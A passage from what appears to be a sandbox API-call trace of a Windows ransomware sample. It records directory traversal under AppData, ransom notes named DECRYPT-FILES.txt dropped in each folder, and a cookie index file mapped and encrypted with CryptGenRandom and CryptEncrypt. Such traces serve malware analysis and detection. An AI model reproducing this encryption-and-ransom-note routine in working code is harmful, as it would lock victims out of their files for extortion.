cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.070] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0088.070] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp" [0088.070] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.071] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.071] CloseHandle (hObject=0x0) returned 0 [0088.071] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.071] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.071] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.071] CloseHandle (hObject=0x448) returned 1 [0088.071] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0088.071] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0088.071] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0088.071] lstrcatW (in: lpString1="CTLs", lpString2="\\" | out: lpString1="CTLs\\") returned="CTLs\\" [0088.071] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0088.072] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\jkbimi8.tmp") returned 82 [0088.072] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.072] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 70 [0088.072] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.072] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt") returned 88 [0088.072] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.072] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.073] CloseHandle (hObject=0x44c) returned 1 [0088.073] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 70 [0088.073] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0088.073] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.074] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.074] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.074] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.074] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0088.074] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp" [0088.074] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.074] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.074] CloseHandle (hObject=0x0) returned 0 [0088.075] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.075] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.075] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.075] CloseHandle (hObject=0x448) returned 1 [0088.075] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.075] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0088.075] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp" [0088.075] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.075] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.075] CloseHandle (hObject=0x0) returned 0 [0088.075] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.076] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.076] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.076] CloseHandle (hObject=0x440) returned 1 [0088.076] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My\\", cAlternateFileName="")) returned 0 [0088.076] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0088.076] CloseHandle (hObject=0x438) returned 1 [0088.076] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0088.076] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0088.076] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0088.076] lstrcatW (in: lpString1="Windows", lpString2="\\" | out: lpString1="Windows\\") returned="Windows\\" [0088.076] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Windows\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" [0088.076] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\jkbimi8.tmp") returned 63 [0088.076] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0088.079] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned 51 [0088.079] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.079] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt") returned 69 [0088.079] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0088.079] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.080] CloseHandle (hObject=0x43c) returned 1 [0088.080] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned 51 [0088.081] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*" [0088.081] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0088.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.081] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.081] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.081] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe7f4ba2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0088.081] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0088.081] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0088.081] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0088.081] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0088.081] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\jkbimi8.tmp") returned 71 [0088.081] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.081] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0088.081] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.081] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt") returned 77 [0088.081] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.082] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.083] CloseHandle (hObject=0x444) returned 1 [0088.083] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 59 [0088.083] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0088.083] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.083] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.083] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.083] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.083] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.083] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b25da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.083] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0088.083] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="index.dat" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" [0088.083] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.084] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.084] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=16384) returned 1 [0088.084] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0088.084] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.085] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.085] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.086] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.087] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0088.087] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.088] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.088] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.089] CloseHandle (hObject=0x44c) returned 1 [0088.089] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.089] WriteFile (in: hFile=0x448, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0088.090] CloseHandle (hObject=0x0) returned 0 [0088.090] CloseHandle (hObject=0x448) returned 1 [0088.090] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.091] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.091] GetTickCount () returned 0x114e772 [0088.091] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.091] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.091] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.091] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.092] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.092] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned 68 [0088.092] wsprintfW (in: param_1=0x3f2d730, 